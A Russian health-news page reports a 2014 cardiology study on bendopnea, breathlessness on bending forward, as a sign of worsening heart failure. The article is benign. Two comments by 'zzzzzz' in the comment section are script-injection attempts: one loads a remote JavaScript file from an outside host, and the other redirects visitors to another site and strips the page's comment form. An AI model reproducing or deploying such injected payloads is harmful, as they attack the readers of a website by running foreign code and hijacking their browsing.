Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У вас больное сердце! Нет...  >>  У вас больное сердце! Нет? А если нагнуться?
 
Обратная связь
 

У вас больное сердце! Нет? А если нагнуться?

Размер шрифта
15 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, бытовые мелочи могут многое сказать о состоянии вашего сердца: к примеру, одышка при наклоне вперед (как при завязывании шнурков на ботинках) – очень серьезный симптом. Ученым-кардиологам удалось установить, что такая одышка является признаком тяжелой сердечной недостаточности.

У вас больное сердце! Нет? А если нагнуться?

Это состояние, получившее название бендопноэ – легко определяемый симптом, который может помочь врачам диагностировать избыток жидкости у пациентов с сердечной недостаточностью. Подробная информация о нем была опубликована в журнале Американского Колледжа Кардиологов.

«Некоторые пациенты считают, что одышка возникает у них из-за того, что они в плохой форме или имеют избыточный вес. Однако нам показалось, что за этим скрывается что-то еще. Поэтому мы провели исследование, чтобы подробно изучить этот симптом», – рассказывает доктор Дженнифер Тибодо, профессор из отделения кардиологии.

Доктор Тибодо предупреждает, что бендопноэ не является фактором риска сердечной недостаточности. Этот симптом говорит о том, что пациенту с сердечной недостаточностью становится хуже, и что ему нужно назначить более серьезное лечение. Бендопное может помочь как врачам, так и пациентам определить, что, возможно, назначенное лечение недостаточно эффективно. Пациенты обязательно должны сообщить своему кардиологу о появлении этого симптома, считает доктор Тибодо.

Из 5.7 миллионов американцев, имеющих сердечную недостаточность, около 10% страдают от тяжелой формы этого заболевания. При этом состоянии стандартная терапия больше не работает.

Врачи провели обследование 102 пациентов и выяснили, что у трети из них присутствует бендопное. Они измерили давление и сердечный выброс (показывает, насколько хорошо сердце прокачивает кровь по телу) у всех пациентов, а затем повторили измерения после того, как участники эксперимента сидели в течение двух минут, а также после наклона вперед в течение одной минуты.

«Мы смогли определить, что у пациентов с бендопноэ присутствовал избыток жидкости в организме, который послужил причиной повышенного давления. Когда они наклонялись вперед, давление увеличивалось еще больше», – добавляет доктор Тибодо.

Так что если вы вдруг обнаружили такой симптом у себя – это повод записаться на внеочередной прием к врачу.

О том, как правильно заботиться о пламенном моторе у вас в груди, читайте на страницах нашего специального проекта «Близко к сердцу».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Arturiya

20 октября 2014 в 23:50

Цитировать   |   Пожаловаться

Кажется это не то чего я ожидал

2 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Грязный воздух может остановить сердце   Как понять, что вы пьете слишком много? Или уже спиваетесь?   Горький шоколад полезен для сердца! Но все благодаря бактериям!   Бегом на улицу! Солнце понижает давление!  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
5 напитков, которые защитят ваше сердце
Оказывается, шоколад НАДО есть!
Как сохранить мозги в 30 лет

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.